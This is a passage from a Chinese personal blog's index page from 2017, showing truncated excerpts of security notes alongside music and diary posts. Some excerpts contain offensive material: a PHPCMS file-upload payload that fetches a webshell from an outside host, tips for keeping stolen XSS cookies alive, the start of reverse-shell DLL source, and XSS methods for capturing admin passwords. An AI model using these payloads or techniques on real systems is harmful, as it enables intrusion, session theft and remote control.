MS17-010防范方法最新勒索病毒(Wannacry蠕虫)防范方法（445端口关闭方法)

其实关闭这个端口，关闭那个端口的很费劲，而且有的时候还关闭不了，最重要的是你瞎设置万一出错了呢？？？说来说去何必那么费劲！？！？直接打补丁不就完事了么。 WIN7 32(x86)位操作系统补丁地址： http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x86_6bb04d3971bb58ae4bac44219e7169812914df3f.msu ...

2017年05月13日学习笔记暂无评论喜欢 0 阅读 3,131 views 次阅读全文

xss平台持久cookie说明 keepsession说明

keepsession功能说明首先简单说明一下【XSS利用之延长Session生命周期】，说白了就是携带你X到的cookie访问对应的URL地址，一般情况下，如果你X到了对方的cookie，时间长不访问(默认21分钟)后，这个cookie就会失效，你就无法使用这个cookie。那么只要你携带着这个X到的cookie，几分钟访问一次，几分钟访问一次，这样cookie就不会失效(当然，如果程序做了特殊验证，那么就没...

2017年05月09日学习笔记暂无评论喜欢 1 阅读 7,968 views 次阅读全文

China-X-O-P-A-Y-M 集锦 (中国风的电音)

China-X 00:00/00:00 中国从来不乏牛人出现，这首以中国琴音为风格的电音已经火便大江南北，他的作者就是一个中国的帅气小伙，叫“徐梦圆”，这系列的歌曲，节奏欢快，另类的形式展现中国风。我已经开始循环了，你呢。

2017年05月08日纯音乐暂无评论喜欢 0 阅读 3,960 views 次阅读全文

某互联网金融分站储存XSS

其实这个XSS非常简单，没什么技术含量，只不过属于另类‘储存XSS’吧。。(当然也可以伪造一个钓鱼页面。) 这个XSS呢严格的说是储存XSS，但是如果想利用它，似乎暂时我能想到的只是利用反射XSS的方法利用它。也就是说把这个链接发送给别人。具体为什么呢？首先，某站有个上传点。如下图：上传点因为这个网页做了前端的JS上传判断，所以只能上传jpg等图片格式，那我们...

2017年04月24日漏洞安全评论 1 条喜欢 0 阅读 4,685 views 次阅读全文

PHPCMS最新版任意文件上传漏洞及修复方法

注意这个漏洞不知道是哪位朋友爆出来的，找不到来路。。我只是给了修复建议。首先打开注册页面，然后向注册页面POST如下payload： siteid=1&modelid=11&username=123456&password=123456&[email protected]&info[content]=<img src=http://xss.com/webshell//php_assert.php#.jpg>&dosubmit=1&protocol= 然后就会报错并返回shell地址...

2017年04月21日学习笔记评论 2 条喜欢 1 阅读 5,731 views 次阅读全文

快乐崇拜 Come On

快乐崇拜 00:00/00:00 其实快乐崇拜的这首歌的原曲是韩国的一个叫乌龟组合所唱，记得第一次听这个歌曲的时候，我还在上初3吧，应该是了，那个时候还在玩奇迹私服，记得当时听第一遍就非常喜欢这首歌曲了呢，那应该是在一个星期三、四的中午吧，中午放学，立马跑到了网吧，一元一小时，记得网吧的名字叫《新世纪网吧》，然后听到了同学放这首歌曲，真的很好听。快乐...

2017年04月20日经典老歌暂无评论喜欢 0 阅读 5,754 views 次阅读全文

真是够贱

想了好一会儿，最终把本篇文章的标题定为【真是够贱】，当然我指的是我自己！！！事出有因，先说一下前因吧，在今年1月份我就已经关注了一款手机，是华为P10（Plus），关注了不知道多久了，然后3月24日终于国内发布会了，然后就是漫长的大家抢买手机过程，问题就在于我真的是看重了华为这个品牌以及这款手机。然后特别坚定，几乎问遍了苏州的实体华为店铺、几乎问遍南京的实...

2017年04月20日个人日记评论 9 条喜欢 3 阅读 7,767 views 次阅读全文

dll 反弹代码

作者：lostwolf 地址：https://www.t00ls.net/thread-39410-1-1.html // dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "stdafx.h" #include #include #pragma comment(lib,"ws2_32") void reverse_shell(); WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; STARTUPINFO ini_processo; PROCESS_INFORMATION processo_info; BOOL WINAPI D...

2017年04月19日汪洋大海暂无评论喜欢 0 阅读 2,927 views 次阅读全文

php 多线程之 function() use() {}

因为最近在写弄一个多线程采集的东东，用到了一个多线程采集的插件，但是因为这个多线程采集的时候是闭包的，直接会给采集结果，这个采集结果没办法实际利用。所以嘞。最终百度了一下，发现function() use() {} 可以很好的解决这个问题。看下面的代码。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 getDatacontent(function($...

2017年04月18日学习笔记暂无评论喜欢 1 阅读 3,758 views 次阅读全文

xss获取后台二级密码 – URL跳转 (地址栏不变)

下面这段话来自土司地址：https://www.t00ls.net/thread-39293-1-1.html -------【现在很多后台有二级密码，也就是说，你x进去后，还是要输入一个密码才能搞定。但鉴浏览器没有记录这个二级密码，所以不能通过xss来读取。键盘记录的代码只能获取当前页面的表单来记录，然后提交到x平台。而二级密码这个页面又不能插入xss代码，所以不能通过这个键盘记录来获取二级密码。所...

2017年04月13日学习笔记暂无评论喜欢 2 阅读 6,057 views 次阅读全文

蜗居

窄小蜗居，虽非富贵王侯宅；清闲螺径，也异寻常百姓家。 woj → 蜗居